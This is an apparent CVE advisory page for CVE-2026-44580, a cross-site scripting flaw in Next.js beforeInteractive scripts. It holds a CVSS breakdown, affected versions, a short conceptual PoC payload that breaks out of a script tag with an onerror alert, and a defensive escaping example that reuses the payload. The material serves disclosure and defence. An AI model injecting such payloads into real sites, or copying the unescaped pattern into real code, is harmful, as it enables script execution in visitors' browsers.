Security Vulnerability Report
CVE-2026-44580 CVSS 6.1 MEDIUM

CVE-2026-44580

Published: 2026-05-13 18:16:18
Last Modified: 2026-05-14 18:33:34

Description

Next.js is a React framework for building full-stack web applications. From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive scripts together with untrusted content can be vulnerable to cross-site scripting. In affected versions, serialized script content was not escaped safely before being embedded into the document, which could allow attacker-controlled input to break out of the intended script context and execute arbitrary JavaScript in a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* - VULNERABLE (Next.js >= 13.0.0, < 15.5.16)
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* - VULNERABLE (Next.js >= 16.0.0, < 16.2.5)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC for CVE-2026-44580
// Conceptual exploit demonstrating the lack of escaping in beforeInteractive scripts

// Malicious input controlled by the attacker
const attackerPayload = '</script><img src=x onerror=alert(1)><script>';

// In a vulnerable Next.js application, this input might be passed
// directly to a beforeInteractive script configuration.
// Example vulnerable code pattern:
// <Script id="user-data" strategy="beforeInteractive">
//   window.userData = JSON.parse('${attackerPayload}');
// </Script>

// The resulting HTML rendered by the server would look like this:
// <script id="user-data">window.userData = JSON.parse('</script><img src=x onerror=alert(1)><script>');</script>

// The browser interprets the first closing </script> tag, breaking out of the
// intended context and executing the alert(1) as an image error handler.
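The defensive counterpart to the pattern above, as an added example: it is not Next.js code and not the patch shipped in 15.5.16 / 16.2.5. It serializes untrusted data for an inline script twice, once with plain JSON.stringify and once with markup-significant characters escaped, and counts how many closing script tags an HTML parser would see. All function names are hypothetical.

```javascript
// Added illustration; not code from Next.js or from the advisory.
// Function names are hypothetical.

// Characters that can end or alter an inline <script> block, mapped to
// JavaScript string escapes that the HTML parser does not treat as markup.
const SCRIPT_ESCAPES = {
  '<': '\\u003c',
  '>': '\\u003e',
  '&': '\\u0026',
  '\u2028': '\\u2028',
  '\u2029': '\\u2029',
};

// Weak form: JSON.stringify escapes quotes and backslashes only, so a value
// containing "</script>" still closes the surrounding element.
// (id is assumed to be a developer-chosen constant, not user input.)
function renderInlineDataNaive(id, value) {
  return `<script id="${id}">window.userData = ${JSON.stringify(value)};</script>`;
}

// Hardened form: same JSON, with the characters above rewritten as \uXXXX
// escapes. The JavaScript parser decodes them back to the original text.
function serializeForInlineScript(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g, (ch) => SCRIPT_ESCAPES[ch]);
}

function renderInlineDataSafe(id, value) {
  return `<script id="${id}">window.userData = ${serializeForInlineScript(value)};</script>`;
}

// Counts closing script tags the way an HTML tokenizer matches them:
// case-insensitive "</script" followed by whitespace, "/" or ">".
function countScriptClosers(html) {
  return (html.match(/<\/script[\s/>]/gi) || []).length;
}

// Constructed sample input: the payload string from the PoC section.
const untrusted = { name: '</script><img src=x onerror=alert(1)><script>' };

const naive = renderInlineDataNaive('user-data', untrusted);
const safe = renderInlineDataSafe('user-data', untrusted);

console.log('closers in naive output:', countScriptClosers(naive));
console.log('closers in safe output: ', countScriptClosers(safe));
console.log(safe);
```

More than one closing tag in the rendered output means the data ended the script element early; the escaped form leaves exactly one, and the value still round-trips unchanged.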

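References

https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h (Vendor Advisory, Mitigation)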

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44580", "sourceIdentifier": "[email protected]", "published": "2026-05-13T18:16:18.260", "lastModified": "2026-05-14T18:33:34.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Next.js is a React framework for building full-stack web applications. From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive scripts together with untrusted content can be vulnerable to cross-site scripting. In affected versions, serialized script content was not escaped safely before being embedded into the document, which could allow attacker-controlled input to break out of the intended script context and execute arbitrary JavaScript in a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "13.0.0", "versionEndExcluding": "15.5.16", "matchCriteriaId": "38F6033B-EE4D-4FA6-8C47-0A11A6870E85"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "16.0.0", "versionEndExcluding": "16.2.5", "matchCriteriaId": "27C5CF7A-7A33-4BE4-B8FD-10BFD813204A"}]}]}], "references": [{"url": 
"https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}